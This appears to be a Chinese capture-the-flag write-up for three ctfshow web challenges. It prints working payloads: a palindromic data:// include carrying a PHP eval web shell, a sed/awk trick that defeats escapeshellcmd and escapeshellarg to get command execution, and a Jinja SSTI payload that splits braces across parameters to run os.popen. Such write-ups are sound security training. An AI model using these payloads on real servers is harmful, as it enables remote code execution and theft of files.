ctfshow单身杯部分wp

web签到

题目代码

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

strrev函数，将字符串倒序。让倒序的字符串等于它本身，最后进行一个包含。我们可以用data伪协议来传一句话木马进去，payload为

?1=system('cat /f*');
file=data://text/plain,<?php eval($_GET[1]);?>>?;)]1[TEG_$(lave php?<,nialp/txet//:atad

只需满足逆序等于它本身即可。

easyPHP

看题目代码

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

escapeshellcmd()函数是会对 &#;|*?~<>^()[]{}$`, \x0A 和 \xFF。 ' 和 " 仅在不配对儿的时候被转义，目的就是为了不让用户输入的恶意指令发挥作用。

escapeshellarg()将用户输入的字符串整合为一个字符串，目的是为了避免多参数注入。

shell_exec()函数，只会在后端执行命令，不会把执行结果返回给用户，无回显。

这里就要学到两个命令了。

sed

一个是sed命令。在没有任何语句的时候，它会把源文件的内容直接输出出来。我们可以利用sed正则表达式来修改shell_exec()函数并且保存为另一个文件中，（sed 正则表达式 - sed 基础教程 - 简单教程，简单编程）

先上payload：

cmd=sed&param=/esca/d;s/shell_exec/system/g;w 123.php

/esca/是为了匹配escapeshellcmd()和escapeshellarg()函数，用d参数把他们删除。s参数是为了将shell_exec()函数替换为system函数，g是全局替换标志。最后将它保存在123.php文件中。

那我们直接访问123.php。

发现代码确实改变了。那接下来就直接可以命令执行找到flag了。 最终payload:

cmd=cat /f*&param=1

awk

另一个是awk命令。就是将执行的命令语句输入到文件中并执行。因为是没有回显的，所以可以写入文件里，然后访问查看。就比如我输入cmd=awk&param={system("whoami>1.php")}，查看1.php，

那么就可以直接rce了。最终payload:

cmd=awk&param={system("cat /f*>1.php")}

 相关知识链接：shell编程之awk命令详解 - QuincyHu - 博客园 (cnblogs.com)

姻缘测试

查看源代码，通过/source找到hint。

def is_hacker(string):
 """
整那些个花里胡哨的waf有啥用，还不如这一个，直接杜绝SSTI
 """ 
  if "{" in string and "}" in string :
    return True
  else: 
    return False 

单看这个hint还真不知道是啥意思。试着找注入点，注入点应该就是写姓名的地方。输入{{7*7}}返回hacker，那应该是过滤了{}字符。

 在boy_name中写入&girl_name字符串，那么就不满足boy_name或者说girl_name参数同时存在{和}字符的情况。可以成功绕过限制了。

直接上payload:

result?boy_name={{'&girl_name='.__class__.__base__.__subclasses__()[81].__init__.__globals__.__import__("os").popen("cat%09/flag.txt").read()}}

目前还不清楚其他payload构造思路。 

最后一题以后再填坑。